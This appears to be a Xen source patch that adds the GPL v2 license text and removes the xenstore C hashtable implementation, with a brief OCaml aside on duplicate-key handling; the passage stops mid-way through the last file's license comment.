+                   GNU GENERAL PUBLIC LICENSE
+                      Version 2, June 1991
+
+ Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
+ 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+                           Preamble
+
+  The licenses for most software are designed to take away your
+freedom to share and change it.  By contrast, the GNU General Public
+License is intended to guarantee your freedom to share and change free
+software--to make sure the software is free for all its users.  This
+General Public License applies to most of the Free Software
+Foundation's software and to any other program whose authors commit to
+using it.  (Some other Free Software Foundation software is covered by
+the GNU Lesser General Public License instead.)  You can apply it to
+your programs, too.
+
+  When we speak of free software, we are referring to freedom, not
+price.  Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+this service if you wish), that you receive source code or can get it
+if you want it, that you can change the software or use pieces of it
+in new free programs; and that you know you can do these things.
+
+  To protect your rights, we need to make restrictions that forbid
+anyone to deny you these rights or to ask you to surrender the rights.
+These restrictions translate to certain responsibilities for you if you
+distribute copies of the software, or if you modify it.
+
+  For example, if you distribute copies of such a program, whether
+gratis or for a fee, you must give the recipients all the rights that
+you have.  You must make sure that they, too, receive or can get the
+source code.  And you must show them these terms so they know their
+rights.
+
+  We protect your rights with two steps: (1) copyright the software, and
+(2) offer you this license which gives you legal permission to copy,
+distribute and/or modify the software.
+
+  Also, for each author's protection and ours, we want to make certain
+that everyone understands that there is no warranty for this free
+software.  If the software is modified by someone else and passed on, we
+want its recipients to know that what they have is not the original, so
+that any problems introduced by others will not reflect on the original
+authors' reputations.
+
+  Finally, any free program is threatened constantly by software
+patents.  We wish to avoid the danger that redistributors of a free
+program will individually obtain patent licenses, in effect making the
+program proprietary.  To prevent this, we have made it clear that any
+patent must be licensed for everyone's free use or not licensed at all.
+
+  The precise terms and conditions for copying, distribution and
+modification follow.
+
+                   GNU GENERAL PUBLIC LICENSE
+   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
+
+  0. This License applies to any program or other work which contains
+a notice placed by the copyright holder saying it may be distributed
+under the terms of this General Public License.  The "Program", below,
+refers to any such program or work, and a "work based on the Program"
+means either the Program or any derivative work under copyright law:
+that is to say, a work containing the Program or a portion of it,
+either verbatim or with modifications and/or translated into another
+language.  (Hereinafter, translation is included without limitation in
+the term "modification".)  Each licensee is addressed as "you".
+
+Activities other than copying, distribution and modification are not
+covered by this License; they are outside its scope.  The act of
+running the Program is not restricted, and the output from the Program
+is covered only if its contents constitute a work based on the
+Program (independent of having been made by running the Program).
+Whether that is true depends on what the Program does.
+
+  1. You may copy and distribute verbatim copies of the Program's
+source code as you receive it, in any medium, provided that you
+conspicuously and appropriately publish on each copy an appropriate
+copyright notice and disclaimer of warranty; keep intact all the
+notices that refer to this License and to the absence of any warranty;
+and give any other recipients of the Program a copy of this License
+along with the Program.
+
+You may charge a fee for the physical act of transferring a copy, and
+you may at your option offer warranty protection in exchange for a fee.
+
+  2. You may modify your copy or copies of the Program or any portion
+of it, thus forming a work based on the Program, and copy and
+distribute such modifications or work under the terms of Section 1
+above, provided that you also meet all of these conditions:
+
+    a) You must cause the modified files to carry prominent notices
+    stating that you changed the files and the date of any change.
+
+    b) You must cause any work that you distribute or publish, that in
+    whole or in part contains or is derived from the Program or any
+    part thereof, to be licensed as a whole at no charge to all third
+    parties under the terms of this License.
+
+    c) If the modified program normally reads commands interactively
+    when run, you must cause it, when started running for such
+    interactive use in the most ordinary way, to print or display an
+    announcement including an appropriate copyright notice and a
+    notice that there is no warranty (or else, saying that you provide
+    a warranty) and that users may redistribute the program under
+    these conditions, and telling the user how to view a copy of this
+    License.  (Exception: if the Program itself is interactive but
+    does not normally print such an announcement, your work based on
+    the Program is not required to print an announcement.)
+
+These requirements apply to the modified work as a whole.  If
+identifiable sections of that work are not derived from the Program,
+and can be reasonably considered independent and separate works in
+themselves, then this License, and its terms, do not apply to those
+sections when you distribute them as separate works.  But when you
+distribute the same sections as part of a whole which is a work based
+on the Program, the distribution of the whole must be on the terms of
+this License, whose permissions for other licensees extend to the
+entire whole, and thus to each and every part regardless of who wrote it.
+
+Thus, it is not the intent of this section to claim rights or contest
+your rights to work written entirely by you; rather, the intent is to
+exercise the right to control the distribution of derivative or
+collective works based on the Program.
+
+In addition, mere aggregation of another work not based on the Program
+with the Program (or with a work based on the Program) on a volume of
+a storage or distribution medium does not bring the other work under
+the scope of this License.
+
+  3. You may copy and distribute the Program (or a work based on it,
+under Section 2) in object code or executable form under the terms of
+Sections 1 and 2 above provided that you also do one of the following:
+
+    a) Accompany it with the complete corresponding machine-readable
+    source code, which must be distributed under the terms of Sections
+    1 and 2 above on a medium customarily used for software interchange; or,
+
+    b) Accompany it with a written offer, valid for at least three
+    years, to give any third party, for a charge no more than your
+    cost of physically performing source distribution, a complete
+    machine-readable copy of the corresponding source code, to be
+    distributed under the terms of Sections 1 and 2 above on a medium
+    customarily used for software interchange; or,
+
+    c) Accompany it with the information you received as to the offer
+    to distribute corresponding source code.  (This alternative is
+    allowed only for noncommercial distribution and only if you
+    received the program in object code or executable form with such
+    an offer, in accord with Subsection b above.)
+
+The source code for a work means the preferred form of the work for
+making modifications to it.  For an executable work, complete source
+code means all the source code for all modules it contains, plus any
+associated interface definition files, plus the scripts used to
+control compilation and installation of the executable.  However, as a
+special exception, the source code distributed need not include
+anything that is normally distributed (in either source or binary
+form) with the major components (compiler, kernel, and so on) of the
+operating system on which the executable runs, unless that component
+itself accompanies the executable.
+
+If distribution of executable or object code is made by offering
+access to copy from a designated place, then offering equivalent
+access to copy the source code from the same place counts as
+distribution of the source code, even though third parties are not
+compelled to copy the source along with the object code.
+
+  4. You may not copy, modify, sublicense, or distribute the Program
+except as expressly provided under this License.  Any attempt
+otherwise to copy, modify, sublicense or distribute the Program is
+void, and will automatically terminate your rights under this License.
+However, parties who have received copies, or rights, from you under
+this License will not have their licenses terminated so long as such
+parties remain in full compliance.
+
+  5. You are not required to accept this License, since you have not
+signed it.  However, nothing else grants you permission to modify or
+distribute the Program or its derivative works.  These actions are
+prohibited by law if you do not accept this License.  Therefore, by
+modifying or distributing the Program (or any work based on the
+Program), you indicate your acceptance of this License to do so, and
+all its terms and conditions for copying, distributing or modifying
+the Program or works based on it.
+
+  6. Each time you redistribute the Program (or any work based on the
+Program), the recipient automatically receives a license from the
+original licensor to copy, distribute or modify the Program subject to
+these terms and conditions.  You may not impose any further
+restrictions on the recipients' exercise of the rights granted herein.
+You are not responsible for enforcing compliance by third parties to
+this License.
+
+  7. If, as a consequence of a court judgment or allegation of patent
+infringement or for any other reason (not limited to patent issues),
+conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License.  If you cannot
+distribute so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you
+may not distribute the Program at all.  For example, if a patent
+license would not permit royalty-free redistribution of the Program by
+all those who receive copies directly or indirectly through you, then
+the only way you could satisfy both it and this License would be to
+refrain entirely from distribution of the Program.
+
+If any portion of this section is held invalid or unenforceable under
+any particular circumstance, the balance of the section is intended to
+apply and the section as a whole is intended to apply in other
+circumstances.
+
+It is not the purpose of this section to induce you to infringe any
+patents or other property right claims or to contest validity of any
+such claims; this section has the sole purpose of protecting the
+integrity of the free software distribution system, which is
+implemented by public license practices.  Many people have made
+generous contributions to the wide range of software distributed
+through that system in reliance on consistent application of that
+system; it is up to the author/donor to decide if he or she is willing
+to distribute software through any other system and a licensee cannot
+impose that choice.
+
+This section is intended to make thoroughly clear what is believed to
+be a consequence of the rest of this License.
+
+  8. If the distribution and/or use of the Program is restricted in
+certain countries either by patents or by copyrighted interfaces, the
+original copyright holder who places the Program under this License
+may add an explicit geographical distribution limitation excluding
+those countries, so that distribution is permitted only in or among
+countries not thus excluded.  In such case, this License incorporates
+the limitation as if written in the body of this License.
+
+  9. The Free Software Foundation may publish revised and/or new versions
+of the General Public License from time to time.  Such new versions will
+be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+Each version is given a distinguishing version number.  If the Program
+specifies a version number of this License which applies to it and "any
+later version", you have the option of following the terms and conditions
+either of that version or of any later version published by the Free
+Software Foundation.  If the Program does not specify a version number of
+this License, you may choose any version ever published by the Free Software
+Foundation.
+
+  10. If you wish to incorporate parts of the Program into other free
+programs whose distribution conditions are different, write to the author
+to ask for permission.  For software which is copyrighted by the Free
+Software Foundation, write to the Free Software Foundation; we sometimes
+make exceptions for this.  Our decision will be guided by the two goals
+of preserving the free status of all derivatives of our free software and
+of promoting the sharing and reuse of software generally.
+
+                           NO WARRANTY
+
+  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
+FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
+OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
+PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
+OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
+TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
+PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
+REPAIR OR CORRECTION.
+
+  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
+REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
+INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
+OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
+TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
+YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
+PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
+POSSIBILITY OF SUCH DAMAGES.
+
+                    END OF TERMS AND CONDITIONS
+
+           How to Apply These Terms to Your New Programs
+
+  If you develop a new program, and you want it to be of the greatest
+possible use to the public, the best way to achieve this is to make it
+free software which everyone can redistribute and change under these terms.
+
+  To do so, attach the following notices to the program.  It is safest
+to attach them to the start of each source file to most effectively
+convey the exclusion of warranty; and each file should have at least
+the "copyright" line and a pointer to where the full notice is found.
+
+    <one line to give the program's name and a brief idea of what it does.>
+    Copyright (C) <year>  <name of author>
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License along
+    with this program; if not, write to the Free Software Foundation, Inc.,
+    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+
+Also add information on how to contact you by electronic and paper mail.
+
+If the program is interactive, make it output a short notice like this
+when it starts in an interactive mode:
+
+    Gnomovision version 69, Copyright (C) year name of author
+    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
+    This is free software, and you are welcome to redistribute it
+    under certain conditions; type `show c' for details.
+
+The hypothetical commands `show w' and `show c' should show the appropriate
+parts of the General Public License.  Of course, the commands you use may
+be called something other than `show w' and `show c'; they could even be
+mouse-clicks or menu items--whatever suits your program.
+
+You should also get your employer (if you work as a programmer) or your
+school, if any, to sign a "copyright disclaimer" for the program, if
+necessary.  Here is a sample; alter the names:
+
+  Yoyodyne, Inc., hereby disclaims all copyright interest in the program
+  `Gnomovision' (which makes passes at compilers) written by James Hacker.
+
+  <signature of Ty Coon>, 1 April 1989
+  Ty Coon, President of Vice
+
+This General Public License does not permit incorporating your program into
+proprietary programs.  If your program is a subroutine library, you may
+consider it more useful to permit linking proprietary applications with the
+library.  If this is what you want to do, use the GNU Lesser General
+Public License instead of this License.
diff -r 10a8fae412c5 tools/xenstore/hashtable.c
--- a/tools/xenstore/hashtable.c        Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,285 +0,0 @@
-/* Copyright (C) 2004 Christopher Clark <firstname.lastname@xxxxxxxxxxxx> */
-
-#include "hashtable.h"
-#include "hashtable_private.h"
-#include <stdlib.h>
-#include <stdio.h>
-#include <string.h>
-#include <math.h>
-#include <stdint.h>
-
-/*
-Credit for primes table: Aaron Krowne
- http://br.endernet.org/~akrowne/
- http://planetmath.org/encyclopedia/GoodHashTablePrimes.html
-*/
-static const unsigned int primes[] = {
-53, 97, 193, 389,
-769, 1543, 3079, 6151,
-12289, 24593, 49157, 98317,
-196613, 393241, 786433, 1572869,
-3145739, 6291469, 12582917, 25165843,
-50331653, 100663319, 201326611, 402653189,
-805306457, 1610612741
-};
-const unsigned int prime_table_length = sizeof(primes)/sizeof(primes[0]);
-const unsigned int max_load_factor = 65; /* percentage */
-
-/*****************************************************************************/
-struct hashtable *
-create_hashtable(unsigned int minsize,
-                 unsigned int (*hashf) (void*),
-                 int (*eqf) (void*,void*))
-{
-    struct hashtable *h;
-    unsigned int pindex, size = primes[0];
-
-    /* Check requested hashtable isn't too large */
-    if (minsize > (1u << 30)) return NULL;
-
-    /* Enforce size as prime */
-    for (pindex=0; pindex < prime_table_length; pindex++) {
-        if (primes[pindex] > minsize) { size = primes[pindex]; break; }
-    }
-
-    h = (struct hashtable *)calloc(1, sizeof(struct hashtable));
-    if (NULL == h)
-        goto err0;
-    h->table = (struct entry **)calloc(size, sizeof(struct entry *));
-    if (NULL == h->table)
-        goto err1;
-
-    h->tablelength  = size;
-    h->primeindex   = pindex;
-    h->entrycount   = 0;
-    h->hashfn       = hashf;
-    h->eqfn         = eqf;
-    h->loadlimit    = (unsigned int)(((uint64_t)size * max_load_factor) / 100);
-    return h;
-
-err1:
-   free(h);
-err0:
-   return NULL;
-}
-
-/*****************************************************************************/
-unsigned int
-hash(struct hashtable *h, void *k)
-{
-    /* Aim to protect against poor hash functions by adding logic here
-     * - logic taken from java 1.4 hashtable source */
-    unsigned int i = h->hashfn(k);
-    i += ~(i << 9);
-    i ^=  ((i >> 14) | (i << 18)); /* >>> */
-    i +=  (i << 4);
-    i ^=  ((i >> 10) | (i << 22)); /* >>> */
-    return i;
-}
-
-/*****************************************************************************/
-static int
-hashtable_expand(struct hashtable *h)
-{
-    /* Double the size of the table to accomodate more entries */
-    struct entry **newtable;
-    struct entry *e;
-    struct entry **pE;
-    unsigned int newsize, i, index;
-    /* Check we're not hitting max capacity */
-    if (h->primeindex == (prime_table_length - 1)) return 0;
-    newsize = primes[++(h->primeindex)];
-
-    newtable = (struct entry **)calloc(newsize, sizeof(struct entry*));
-    if (NULL != newtable)
-    {
-        /* This algorithm is not 'stable'. ie. it reverses the list
-         * when it transfers entries between the tables */
-        for (i = 0; i < h->tablelength; i++) {
-            while (NULL != (e = h->table[i])) {
-                h->table[i] = e->next;
-                index = indexFor(newsize,e->h);
-                e->next = newtable[index];
-                newtable[index] = e;
-            }
-        }
-        free(h->table);
-        h->table = newtable;
-    }
-    /* Plan B: realloc instead */
-    else 
-    {
-        newtable = (struct entry **)
-                   realloc(h->table, newsize * sizeof(struct entry *));
-        if (NULL == newtable) { (h->primeindex)--; return 0; }
-        h->table = newtable;
-        memset(newtable[h->tablelength], 0, newsize - h->tablelength);
-        for (i = 0; i < h->tablelength; i++) {
-            for (pE = &(newtable[i]), e = *pE; e != NULL; e = *pE) {
-                index = indexFor(newsize,e->h);
-                if (index == i)
-                {
-                    pE = &(e->next);
-                }
-                else
-                {
-                    *pE = e->next;
-                    e->next = newtable[index];
-                    newtable[index] = e;
-                }
-            }
-        }
-    }
-    h->tablelength = newsize;
-    h->loadlimit   = (unsigned int)
-        (((uint64_t)newsize * max_load_factor) / 100);
-    return -1;
-}
-
-/*****************************************************************************/
-unsigned int
-hashtable_count(struct hashtable *h)
-{
-    return h->entrycount;
-}
-
-/*****************************************************************************/
-int
-hashtable_insert(struct hashtable *h, void *k, void *v)
-{
-    /* This method allows duplicate keys - but they shouldn't be used */
-    unsigned int index;
-    struct entry *e;
-    if (++(h->entrycount) > h->loadlimit)
-    {
-        /* Ignore the return value. If expand fails, we should
-         * still try cramming just this value into the existing table
-         * -- we may not have memory for a larger table, but one more
-         * element may be ok. Next time we insert, we'll try expanding again.*/
-        hashtable_expand(h);
-    }
-    e = (struct entry *)calloc(1, sizeof(struct entry));
-    if (NULL == e) { --(h->entrycount); return 0; } /*oom*/
-    e->h = hash(h,k);
-    index = indexFor(h->tablelength,e->h);
-    e->k = k;
-    e->v = v;
-    e->next = h->table[index];
-    h->table[index] = e;
-    return -1;
-}
-
-/*****************************************************************************/
-void * /* returns value associated with key */
-hashtable_search(struct hashtable *h, void *k)
-{
-    struct entry *e;
-    unsigned int hashvalue, index;
-    hashvalue = hash(h,k);
-    index = indexFor(h->tablelength,hashvalue);
-    e = h->table[index];
-    while (NULL != e)
-    {
-        /* Check hash value to short circuit heavier comparison */
-        if ((hashvalue == e->h) && (h->eqfn(k, e->k))) return e->v;
-        e = e->next;
-    }
-    return NULL;
-}
-
-/*****************************************************************************/
-void * /* returns value associated with key */
-hashtable_remove(struct hashtable *h, void *k)
-{
-    /* TODO: consider compacting the table when the load factor drops enough,
-     *       or provide a 'compact' method. */
-
-    struct entry *e;
-    struct entry **pE;
-    void *v;
-    unsigned int hashvalue, index;
-
-    hashvalue = hash(h,k);
-    index = indexFor(h->tablelength,hash(h,k));
-    pE = &(h->table[index]);
-    e = *pE;
-    while (NULL != e)
-    {
-        /* Check hash value to short circuit heavier comparison */
-        if ((hashvalue == e->h) && (h->eqfn(k, e->k)))
-        {
-            *pE = e->next;
-            h->entrycount--;
-            v = e->v;
-            freekey(e->k);
-            free(e);
-            return v;
-        }
-        pE = &(e->next);
-        e = e->next;
-    }
-    return NULL;
-}
-
-/*****************************************************************************/
-/* destroy */
-void
-hashtable_destroy(struct hashtable *h, int free_values)
-{
-    unsigned int i;
-    struct entry *e, *f;
-    struct entry **table = h->table;
-    if (free_values)
-    {
-        for (i = 0; i < h->tablelength; i++)
-        {
-            e = table[i];
-            while (NULL != e)
-            { f = e; e = e->next; freekey(f->k); free(f->v); free(f); }
-        }
-    }
-    else
-    {
-        for (i = 0; i < h->tablelength; i++)
-        {
-            e = table[i];
-            while (NULL != e)
-            { f = e; e = e->next; freekey(f->k); free(f); }
-        }
-    }
-    free(h->table);
-    free(h);
-}
-
-/*
- * Copyright (c) 2002, Christopher Clark
- * All rights reserved.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 
- * * Redistributions of source code must retain the above copyright
- * notice, this list of conditions and the following disclaimer.
- * 
- * * Redistributions in binary form must reproduce the above copyright
- * notice, this list of conditions and the following disclaimer in the
- * documentation and/or other materials provided with the distribution.
- * 
- * * Neither the name of the original author; nor the names of any contributors
- * may be used to endorse or promote products derived from this software
- * without specific prior written permission.
- * 
- * 
- * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
- * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
- * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
- * A PARTICULAR PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE COPYRIGHT OWNER
- * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
- * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
- * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
- * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
- * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
- * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
- * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
diff -r 10a8fae412c5 tools/xenstore/hashtable.h
--- a/tools/xenstore/hashtable.h        Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,199 +0,0 @@
-/* Copyright (C) 2002 Christopher Clark <firstname.lastname@xxxxxxxxxxxx> */
-
-#ifndef __HASHTABLE_CWC22_H__
-#define __HASHTABLE_CWC22_H__
-
-struct hashtable;
-
-/* Example of use:
- *
- *      struct hashtable  *h;
- *      struct some_key   *k;
- *      struct some_value *v;
- *
- *      static unsigned int         hash_from_key_fn( void *k );
- *      static int                  keys_equal_fn ( void *key1, void *key2 );
- *
- *      h = create_hashtable(16, hash_from_key_fn, keys_equal_fn);
- *      k = (struct some_key *)     malloc(sizeof(struct some_key));
- *      v = (struct some_value *)   malloc(sizeof(struct some_value));
- *
- *      (initialise k and v to suitable values)
- * 
- *      if (! hashtable_insert(h,k,v) )
- *      {     exit(-1);               }
- *
- *      if (NULL == (found = hashtable_search(h,k) ))
- *      {    printf("not found!");                  }
- *
- *      if (NULL == (found = hashtable_remove(h,k) ))
- *      {    printf("Not found\n");                 }
- *
- */
-
-/* Macros may be used to define type-safe(r) hashtable access functions, with
- * methods specialized to take known key and value types as parameters.
- * 
- * Example:
- *
- * Insert this at the start of your file:
- *
- * DEFINE_HASHTABLE_INSERT(insert_some, struct some_key, struct some_value);
- * DEFINE_HASHTABLE_SEARCH(search_some, struct some_key, struct some_value);
- * DEFINE_HASHTABLE_REMOVE(remove_some, struct some_key, struct some_value);
- *
- * This defines the functions 'insert_some', 'search_some' and 'remove_some'.
- * These operate just like hashtable_insert etc., with the same parameters,
- * but their function signatures have 'struct some_key *' rather than
- * 'void *', and hence can generate compile time errors if your program is
- * supplying incorrect data as a key (and similarly for value).
- *
- * Note that the hash and key equality functions passed to create_hashtable
- * still take 'void *' parameters instead of 'some key *'. This shouldn't be
- * a difficult issue as they're only defined and passed once, and the other
- * functions will ensure that only valid keys are supplied to them.
- *
- * The cost for this checking is increased code size and runtime overhead
- * - if performance is important, it may be worth switching back to the
- * unsafe methods once your program has been debugged with the safe methods.
- * This just requires switching to some simple alternative defines - eg:
- * #define insert_some hashtable_insert
- *
- */
-
-/*****************************************************************************
- * create_hashtable
-   
- * @name                    create_hashtable
- * @param   minsize         minimum initial size of hashtable
- * @param   hashfunction    function for hashing keys
- * @param   key_eq_fn       function for determining key equality
- * @return                  newly created hashtable or NULL on failure
- */
-
-struct hashtable *
-create_hashtable(unsigned int minsize,
-                 unsigned int (*hashfunction) (void*),
-                 int (*key_eq_fn) (void*,void*));
-
-/*****************************************************************************
- * hashtable_insert
-   
- * @name        hashtable_insert
- * @param   h   the hashtable to insert into
- * @param   k   the key - hashtable claims ownership and will free on removal
- * @param   v   the value - does not claim ownership
- * @return      non-zero for successful insertion
- *
- * This function will cause the table to expand if the insertion would take
- * the ratio of entries to table size over the maximum load factor.
- *
- * This function does not check for repeated insertions with a duplicate key.
- * The value returned when using a duplicate key is undefined -- when
- * the hashtable changes size, the order of retrieval of duplicate key
- * entries is reversed.
- * If in doubt, remove before insert.
- */
-
-int 
-hashtable_insert(struct hashtable *h, void *k, void *v);
-
-#define DEFINE_HASHTABLE_INSERT(fnname, keytype, valuetype) \
-int fnname (struct hashtable *h, keytype *k, valuetype *v) \
-{ \
-    return hashtable_insert(h,k,v); \
-}
-
-/*****************************************************************************
- * hashtable_search
-   
- * @name        hashtable_search
- * @param   h   the hashtable to search
- * @param   k   the key to search for  - does not claim ownership
- * @return      the value associated with the key, or NULL if none found
- */
-
-void *
-hashtable_search(struct hashtable *h, void *k);
-
-#define DEFINE_HASHTABLE_SEARCH(fnname, keytype, valuetype) \
-valuetype * fnname (struct hashtable *h, keytype *k) \
-{ \
-    return (valuetype *) (hashtable_search(h,k)); \
-}
-
-/*****************************************************************************
- * hashtable_remove
-   
- * @name        hashtable_remove
- * @param   h   the hashtable to remove the item from
- * @param   k   the key to search for  - does not claim ownership
- * @return      the value associated with the key, or NULL if none found
- */
-
-void * /* returns value */
-hashtable_remove(struct hashtable *h, void *k);
-
-#define DEFINE_HASHTABLE_REMOVE(fnname, keytype, valuetype) \
-valuetype * fnname (struct hashtable *h, keytype *k) \
-{ \
-    return (valuetype *) (hashtable_remove(h,k)); \
-}
-
-
-/*****************************************************************************
- * hashtable_count
-   
- * @name        hashtable_count
- * @param   h   the hashtable
- * @return      the number of items stored in the hashtable
- */
-unsigned int
-hashtable_count(struct hashtable *h);
-
-
-/*****************************************************************************
- * hashtable_destroy
-   
- * @name        hashtable_destroy
- * @param   h   the hashtable
- * @param       free_values     whether to call 'free' on the remaining values
- */
-
-void
-hashtable_destroy(struct hashtable *h, int free_values);
-
-#endif /* __HASHTABLE_CWC22_H__ */
-
-/*
- * Copyright (c) 2002, Christopher Clark
- * All rights reserved.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 
- * * Redistributions of source code must retain the above copyright
- * notice, this list of conditions and the following disclaimer.
- * 
- * * Redistributions in binary form must reproduce the above copyright
- * notice, this list of conditions and the following disclaimer in the
- * documentation and/or other materials provided with the distribution.
- * 
- * * Neither the name of the original author; nor the names of any contributors
- * may be used to endorse or promote products derived from this software
- * without specific prior written permission.
- * 
- * 
- * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
- * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
- * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
- * A PARTICULAR PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE COPYRIGHT OWNER
- * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
- * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
- * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
- * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
- * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
- * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
- * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
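For comparison with the duplicate-key caveat in the removed header, here is a minimal sketch of how OCaml's standard Hashtbl behaves. It is an illustration only, not part of the patch; the table name and the "vm" key are made up. Hashtbl.add stacks a new binding on top of an existing one, while Hashtbl.replace is the nearest equivalent of "remove before insert".

```ocaml
(* Typed table: keys are strings, values are ints. The type annotation
   plays the role of the DEFINE_HASHTABLE_* wrappers in the C header. *)
let table : (string, int) Hashtbl.t = Hashtbl.create 16

(* Hashtbl.add never checks for an existing key; it stacks a new binding
   and hides the older one. Returns (visible value, number of bindings). *)
let add_twice () =
  Hashtbl.reset table;
  Hashtbl.add table "vm" 1;
  Hashtbl.add table "vm" 2;
  (Hashtbl.find table "vm", Hashtbl.length table)

(* Hashtbl.replace overwrites the current binding instead of stacking. *)
let replace_twice () =
  Hashtbl.reset table;
  Hashtbl.replace table "vm" 1;
  Hashtbl.replace table "vm" 2;
  (Hashtbl.find table "vm", Hashtbl.length table)
```

Both functions see the value 2, but only add_twice leaves two bindings in the table.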
diff -r 10a8fae412c5 tools/xenstore/hashtable_private.h
--- a/tools/xenstore/hashtable_private.h        Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,85 +0,0 @@
-/* Copyright (C) 2002, 2004 Christopher Clark <firstname.lastname@xxxxxxxxxxxx> */
-
-#ifndef __HASHTABLE_PRIVATE_CWC22_H__
-#define __HASHTABLE_PRIVATE_CWC22_H__
-
-#include "hashtable.h"
-
-/*****************************************************************************/
-struct entry
-{
-    void *k, *v;
-    unsigned int h;
-    struct entry *next;
-};
-
-struct hashtable {
-    unsigned int tablelength;
-    struct entry **table;
-    unsigned int entrycount;
-    unsigned int loadlimit;
-    unsigned int primeindex;
-    unsigned int (*hashfn) (void *k);
-    int (*eqfn) (void *k1, void *k2);
-};
-
-/*****************************************************************************/
-unsigned int
-hash(struct hashtable *h, void *k);
-
-/*****************************************************************************/
-/* indexFor */
-static inline unsigned int
-indexFor(unsigned int tablelength, unsigned int hashvalue) {
-    return (hashvalue % tablelength);
-};
-
-/* Only works if tablelength == 2^N */
-/*static inline unsigned int
-indexFor(unsigned int tablelength, unsigned int hashvalue)
-{
-    return (hashvalue & (tablelength - 1u));
-}
-*/
-
-/*****************************************************************************/
-#define freekey(X) free(X)
-/*define freekey(X) ; */
-
-
-/*****************************************************************************/
-
-#endif /* __HASHTABLE_PRIVATE_CWC22_H__*/
-
-/*
- * Copyright (c) 2002, Christopher Clark
- * All rights reserved.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 
- * * Redistributions of source code must retain the above copyright
- * notice, this list of conditions and the following disclaimer.
- * 
- * * Redistributions in binary form must reproduce the above copyright
